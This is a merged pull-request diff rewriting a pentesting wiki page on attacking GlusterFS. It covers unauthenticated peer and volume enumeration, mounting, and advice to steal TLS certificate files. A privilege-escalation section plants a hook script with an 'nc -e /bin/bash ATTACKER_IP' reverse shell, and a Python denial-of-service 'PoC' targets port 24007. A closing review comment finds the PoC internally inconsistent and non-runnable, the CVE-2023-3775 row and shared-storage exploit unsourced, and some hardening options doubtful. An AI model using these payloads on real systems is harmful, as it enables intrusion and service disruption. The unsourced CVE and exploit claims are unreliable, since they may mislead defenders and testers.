Research Update Enhanced src/network-services-pentesting/240... #1229

Merged
Expand Up @@ -4,41 +4,129 @@

## Basic Information

**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers.

**Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\
For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._
**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters.

```
PORT STATE SERVICE
24007/tcp open rpcbind
49152/tcp open ssl/unknown
PORT STATE SERVICE VERSION
24007/tcp open glusterd GlusterFS (RPC)
49152/tcp open gluster-brick SSL (TLS optional)
```

> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.

## Enumeration

To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
Install the client utilities on your attacking box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
```

To list and mount the available volumes you can use:
1. **Peer discovery & health**

```bash
sudo gluster --remote-host=10.10.11.131 volume list
# This will return the name of the volumes
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

2. **Volume reconnaissance**

sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/`
3. **Mount without privileges**

**Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system):
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```

- /etc/ssl/glusterfs.ca
- /etc/ssl/glusterfs.key
- /etc/ssl/glusterfs.ca.pem
If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. Common issues are:

And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) .
* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)

{{#include ../banners/hacktricks-training.md}}
### Certificate troubleshooting

Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```

---

## Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. |

> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.

### Exploiting `gluster_shared_storage` (Privilege Escalation)

Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with **root** on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version.

### Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())
```
Running the script crashes `glusterfsd` < 11.0.

---

## Hardening & Detection

* **Upgrade** – current LTS is 11.1 (July 2025). All CVEs above are fixed.
* Enable **TLS** for every brick:

```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```
* Restrict clients with CIDR lists:

```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```
* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`).

---



## References

* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}
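Review bot: The "Denial-of-Service PoC (CVE-2023-26253)" block is inconsistent with the rest of this hunk and should be removed or replaced by a citation before merge: the vulnerability table describes the bug as an out-of-bounds read in the FUSE notify handler (a client-side component), the script sends a single 4-byte XDR unsigned int to port 24007, which the port table in this same hunk labels as `glusterd`, and the closing sentence claims it crashes `glusterfsd` (the brick process); nothing in the "Minimal reproducer" comment explains how one packed uint amounts to a "NOTIFY_REPLY XDR frame". As rendered the script also does not run: the two `s.send(...)` lines are not indented under the `with` block, and `xdrlib` was deprecated in Python 3.11 and removed in 3.13. Second, the CVE-2023-3775 row and the whole "Exploiting `gluster_shared_storage`" subsection (the `hooks/1/start/post/` path said to be executed as root cluster-wide, and the `/ss_bricks/` fallback) cite no source, while the References list only covers the generic advisories page and the CVE-2023-26253 repo; please add an advisory or upstream issue link for each, or mark them as unverified. Smaller points: step 3 is titled "Mount without privileges" but the command uses `sudo mount`; the new claim that "versions prior to 9.x used 24008–24009/TCP for brick transport" replaces an unversioned statement ("Previously the port 24009 was used") with a version number that is not sourced; and the Hardening section's `transport.socket.ssl` / `transport.socket.ssl-cert` options should be checked against the upstream TLS documentation (which configures volume TLS through `client.ssl` / `server.ssl` and restricts peers with `auth.ssl-allow`) so readers are not given options that the CLI rejects.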